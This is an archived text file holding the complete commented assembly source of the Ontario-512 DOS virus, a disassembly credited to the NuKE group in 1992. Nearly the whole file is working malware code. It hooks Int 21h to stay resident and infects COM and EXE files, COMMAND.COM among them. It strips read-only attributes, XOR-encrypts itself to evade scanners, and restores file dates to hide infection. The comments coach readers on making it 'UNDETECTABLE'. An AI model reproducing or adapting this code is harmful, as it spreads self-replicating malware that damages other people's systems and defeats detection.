home *** CD-ROM | disk | FTP | other *** search
/ Hacker 2 / HACKER2.mdf / virus / ontario.src < prev    next >
Text File  |  1995-01-03  |  22KB  |  299 lines

  1. ;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 
  2. ;-*                        Ontario-512 Virus                          *- 
  3. ;*-                       ~~~~~~~~~~~~~~~~~~~                         -* 
  4. ;-*  Disassmembly by: Rock Steady/NuKE                                *- 
  5. ;*-  ~~~~~~~~~~~~~~~~                                                 -* 
  6. ;-*  Notes: Resident EXE and COM infector, will infect COMMAND.COM    *- 
  7. ;*-  ~~~~~~ on execution. 512 bytes file increase, memory decrease    -* 
  8. ;-*         of about 2,048 bytes. Anti-debugging, encrypted virus.    *- 
  9. ;*-                                                                   -* 
  10. ;-* (c) Copy-Ya-Rite [NuKE] Viral Development Labs '92                *- 
  11. ;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 
  12. virus       segment byte public                                          
  13.             assume  cs:virus, ds:virus                                   
  14.                                                                          
  15.             org     100h                    ;Guess its a COM File huh?   
  16. ont         proc    far                                                  
  17.                                                                          
  18. start:                                                                   
  19.             jmp     go4it                   ;Jump to beginning of the    
  20.             db      1Dh                     ;Virus And start!            
  21.             db      'fected [NuKE]''92', 0Dh, 0Ah, '$'                   
  22.             mov     dx,0102h        ;This is the small File the Virus    
  23.             mov     ah,09h          ;is infected to! As you see it only  
  24.             int     21h             ;displays that messages and exits    
  25.             int     20h             ;Exit Command for COMs               
  26. go4it:                                                                   
  27.             nop                                                          
  28.             call    decrypt         ;Get Decryption value & Decrypt viri 
  29.             call    virus_start     ;Start the Virus!                    
  30. ont         endp                                                         
  31.                                                                          
  32. ;---------------------------------------------------------------------;  
  33. ;                   The Start of the Virus Code                       ;  
  34. ;---------------------------------------------------------------------;  
  35.                                                                          
  36. virus_start           proc    near                                       
  37.             pop     bp                                                   
  38.             sub     bp,7                                                 
  39.             mov     ax,0FFFFh             ;Is Virus in Memory hooked on? 
  40.             int     21h                     ;the Int 21h?                
  41.             or      ah,ah                   ;                            
  42.             jz      bye_bye                 ;Yes it is... Quit then...   
  43.             push    ds                                                   
  44.             xor     ax,ax                                                
  45.             mov     ds,ax                                                
  46.             sub     word ptr ds:413h,2                                   
  47.             lds     bx,dword ptr ds:84h                                  
  48.             mov     word ptr cs:[200h][bp],bx                            
  49.             mov     word ptr cs:[202h][bp],ds                            
  50.             mov     bx,es                                                
  51.             dec     bx                                                   
  52.             mov     ds,bx                                                
  53.             sub     word ptr ds:3,80h                                    
  54.             mov     ax,ds:12h                                            
  55.             sub     ax,80h                                               
  56.             mov     ds:12h,ax                                            
  57.             mov     es,ax                                                
  58.             push    cs                                                   
  59.             pop     ds                                                   
  60.             mov     si,bp                                                
  61.             xor     di,di                                                
  62.             mov     cx,204h                                              
  63.             cld                                                          
  64.             rep     movsb                                                
  65.             mov     ds,cx                                                
  66.             cli                             ;This is where we hook the   
  67.             mov     word ptr ds:84h,7Fh     ;virus to the Int21h         
  68.             mov     word ptr ds:84h+2,ax                                 
  69.             sti                                                          
  70.             mov     ax,4BFFh                                             
  71.             int     21h                                                  
  72.             pop     ds                                                   
  73.             push    ds                                                   
  74.             pop     es                                                   
  75. bye_bye:                                                                 
  76.             or      bp,bp                                                
  77.             jz      what                                                 
  78.             lea     si,[bp+7Bh]                                          
  79.             nop                                                          
  80.             mov     di,offset ds:[100h]                                  
  81.             push    di                                                   
  82.             cld                                                          
  83.             movsw                                                        
  84.             movsw                                                        
  85.             retn                                                         
  86. what:                                                                    
  87.             mov     ax,es                                                
  88.             add     cs:7dh,ax                                            
  89. ;*          jmp     far ptr go4it7                                       
  90. virus_start           endp                                               
  91.             db      0EAh,0EBh, 15h, 49h, 6Eh                             
  92.             cmp     ax,0FFFFh                                            
  93.             jne     new_21h                                              
  94.             inc     ax                                                   
  95.             iret                                                         
  96. ;---------------------------------------------------------------------;  
  97. ;                     Interrupt 21h handler                           ;  
  98. ;---------------------------------------------------------------------;  
  99. new_21h:                                                                 
  100.            cmp     ah,4Bh        ;Test, is File beginning Executed!      
  101.            jne     leave_ok      ;Nope! Call Int21!                      
  102.            cmp     al,3          ;Overlay, beginning execute?            
  103.            je      leave_ok      ;Yes! Leave it alone                    
  104.            cmp     al,0FFh       ;Virus testing to see if its alive?     
  105.            jne     do_it_man     ;in memory?                             
  106.            push    cs                                                    
  107.            pop     ds                                                    
  108.            mov     dx,1DDh                                               
  109.            call    infect                                                
  110.            iret                                                          
  111. do_it_man:                                                               
  112.            call    infect       ;Infect file dude...                     
  113. leave_ok:                                                                
  114.            jmp     dword ptr cs:[200h]  ;Int21 handler..                 
  115.                                                                          
  116. ;---------------------------------------------------------------------;  
  117. ;              Infection Routine for the Ontario Virus                ;  
  118. ;---------------------------------------------------------------------;  
  119.                                                                          
  120. infect     proc    near                                                  
  121.            push    es                                                    
  122.            push    ds              ;Save them not to fuck things up..    
  123.            push    dx                                                    
  124.            push    cx                                                    
  125.            push    bx                                                    
  126.            push    ax                                                    
  127.            mov     ax,4300h        ;Here we get the file attribute       
  128.            call    int21           ;for file to be infected.             
  129.            jc      outta           ;Bitch Error encountered. Quit!       
  130.            test    cl,1            ;Test if its Read-Only!               
  131.            jz      attrib_ok       ;Ok, it ain't Read-Only Continue!     
  132.            and     cl,0FEh         ;Set Read-Only to normal Attribs      
  133.            mov     ax,4301h        ;Call Ints to do it...                
  134.            call    int21           ;Bingo! Done!                         
  135.            jc      outta           ;Error encountered? Split if yes!     
  136. attrib_ok:                                                               
  137.            mov     ax,3D02h        ;Open file for Read/Write             
  138.            call    int21           ;Call Interrupt to do it!             
  139.            jnc     open_ok         ;no errors? Continue!                 
  140. outta:                                                                   
  141.            jmp     go4it5          ;Hey, Split Man... Errors happened!   
  142. open_ok:                                                                 
  143.            mov     bx,ax           ;BX=File Handle                       
  144.            push    cs                                                    
  145.            pop     ds                                                    
  146.            mov     ax,5700h        ;Get File's Date & Time               
  147.            call    int21           ;Do it!                               
  148.            mov     word ptr ds:[204h],cx  ;Save Time                     
  149.            mov     word ptr ds:[206h],dx  ;Save Date                     
  150.            mov     dx,208h         ;DX=Pointer                           
  151.            mov     cx,1Bh          ;CX=Number of Btyes                   
  152.            mov     ah,3Fh          ;Read From File                       
  153.            call    int21           ;Do It!                               
  154.            jc      go4it1          ;Errors? Quit if yes!                 
  155.            cmp     word ptr ds:[208h],5A4Dh ;Check if files already      
  156.            je      go4it0                   ;infected.                   
  157.            mov     al,byte ptr ds:[209h]   ;Com , Exes...                
  158.            cmp     al,byte ptr ds:[20Bh]                                 
  159.            je      go4it1                                                
  160.            xor     dx,dx                                                 
  161.            xor     cx,cx                                                 
  162.            mov     ax,4202h                                              
  163.            call    int21           ;Move File pointer to end of          
  164.            jc      go4it1          ;file to be infected.                 
  165.            cmp     ax,0E000h       ;File bigger than E000 bytes?         
  166.            ja      go4it1          ;Error...                             
  167.            push    ax              ;Save File Length                     
  168.            mov     ax,word ptr ds:[208h]                                 
  169.            mov     ds:7bh,ax                                             
  170.            mov     ax,word ptr ds:[20Ah]                                 
  171.            mov     ds:7dh,ax                                             
  172.            pop     ax                       ;All this is, is a complex   
  173.            sub     ax,3                     ;way to do "JMP"             
  174.            mov     byte ptr ds:[208h],0E9h  ;                            
  175.            mov     word ptr ds:[209h],ax                                 
  176.            mov     byte ptr ds:[20Bh],al                                 
  177.            jmp     short go4it3             ;File READY Infect it!       
  178.            db      90h                      ;NOP me... detection string? 
  179. go4it0:                                                                  
  180.            cmp     word ptr ds:[21Ch],1                                  
  181.            jne     go4it2                                                
  182. go4it1:                                                                  
  183.            jmp     go4it4                                                
  184. go4it2:                                                                  
  185.            mov     ax,word ptr ds:[20Ch]                                 
  186.            mov     cx,200h                                               
  187.            mul     cx                                                    
  188.            push    ax                                                    
  189.            push    dx                                                    
  190.            mov     cl,4                                                  
  191.            ror     dx,cl                                                 
  192.            shr     ax,cl                                                 
  193.            add     ax,dx                                                 
  194.            sub     ax,word ptr ds:[210h]                                 
  195.            push    ax                                                    
  196.            mov     ax,word ptr ds:[21Ch]                                 
  197.            mov     ds:7bh,ax                                             
  198.            mov     ax,word ptr ds:[21Eh]                                 
  199.            add     ax,10h                                                
  200.            mov     ds:7dh,ax                                             
  201.            pop     ax                      ; This is continues with the  
  202.            mov     word ptr ds:[21Eh],ax   ; above to put a JMP at the   
  203.            mov     word ptr ds:[21Ch],1    ; beginning of the file!      
  204.            inc     word ptr ds:[20Ch]      ;                             
  205.            pop     cx                      ;                             
  206.            pop     dx                      ;                             
  207.            mov     ax,4200h                ;                             
  208.            call    int21                                                 
  209.            jc      go4it4                                                
  210. go4it3:                                                                  
  211.            xor     byte ptr ds:[1F8h],8   ;                              
  212.            xor     ax,ax                  ; Theses Lines copy the        
  213.            mov     ds,ax                  ; virus code else where        
  214.            mov     al,ds:46Ch             ; in memory to get it          
  215.            push    cs                     ; ready to infect the file     
  216.            pop     ds                     ; as we must encrypt it        
  217.            push    cs                     ; FIRST when we infect the     
  218.            pop     es                     ; file. so we'll encrypt       
  219.            mov     byte ptr ds:[1ECh],al  ; this copy we're making!      
  220.            xor     si,si                  ; and append that to the       
  221.            mov     di,offset ds:[224h]    ; end of the file              
  222.            push    di                     ;                              
  223.            mov     cx,200h                ;                              
  224.            cld                            ;                              
  225.            rep     movsb                                                 
  226.            mov     si,offset ds:[228h]    ;Now Encrpyt that copy of the  
  227.            call    encrypt_decrypt        ;virus we just made...         
  228.            pop     dx                                                    
  229.            mov     cx,200h                ;Write Virus to file!          
  230.            mov     ah,40h                 ;BX=Handle, CX=Bytes           
  231.            call    int21                  ;DX=pointer to write buffer    
  232.            jc      go4it4            ;Duh? Check for errors!             
  233.            xor     cx,cx                                                 
  234.            xor     dx,dx                  ;Now move pointer to beginning 
  235.            mov     ax,4200h               ;of file.                      
  236.            call    int21                                                 
  237.            jc      go4it4            ;Duh? Check for errors!             
  238.            mov     dx,208h                ;Write to file!                
  239.            mov     cx,1Bh                 ;CX=Bytes                      
  240.            mov     ah,40h                 ;DX=pointes to buffer          
  241.            call    int21             ;Bah, HumBug                        
  242. go4it4:                                                                  
  243.            mov     dx,word ptr ds:[206h]  ;Leave no tracks...            
  244.            mov     cx,word ptr ds:[204h]  ; puts back File TIME          
  245.            mov     ax,5701h               ; and DATE! on file...         
  246.            call    int21                  ;                              
  247.            mov     ah,3Eh                 ;                              
  248.            call    int21             ;Bah, HumBug...                     
  249. go4it5:                                                                  
  250.            pop     ax                     ;Get lost...                   
  251.            pop     bx                                                    
  252.            pop     cx                                                    
  253.            pop     dx                                                    
  254.            pop     ds                                                    
  255.            pop     es                                                    
  256.            retn                                                          
  257. infect     endp                                                          
  258.                                                                          
  259. ;----------------------------------------------------------------------; 
  260. ;                 The Original Interrupt 21h handler                   ; 
  261. ;----------------------------------------------------------------------; 
  262.                                                                          
  263. int21      proc    near                                                  
  264.            pushf                       ;Fake an Int Call...              
  265.                                                                          
  266.            call    dword ptr cs:[200h] ;Orignal Int21h Handler           
  267.            retn                                                          
  268. int21      endp                                                          
  269.                                                                          
  270.            db      'C:\COMMAND.COM'                                      
  271.            db       00h, 84h                                             
  272.                                                                          
  273. ;---------------------------------------------------------------------;  
  274. ;            The Simple, But VERY Effective Encryption Routine        ;  
  275. ;---------------------------------------------------------------------;  
  276.                                                                          
  277. decrypt    proc    near                                                  
  278.            pop     si                                                    
  279.            push    si                                                    
  280.            mov     al,byte ptr cs:[1E8h][si];INCRYPTION VALUE TO CHANGE! 
  281. encrypt_decrypt:                         ;and Virus will be UNDETECTABLE 
  282.            mov     cx,1E8h            ; LENGTH OF VIRII! Change this!    
  283. loop_me:   not     al                 ; if you modief the virus!         
  284.            xor     cs:[si],al         ;                                  
  285.            inc     si                 ;                                  
  286.            loop    loop_me            ;                                  
  287.                                       ;                                  
  288.            retn                                                          
  289. decrypt    endp                                                          
  290.                                                                          
  291.                                                                          
  292. virus      ends                                                          
  293.            end     start                                                 
  294.                                                                          
  295. ;------------------------------------------------------------------------
  296.  
  297.  
  298. Downloaded From P-80 International Information Systems 304-744-2253
  299.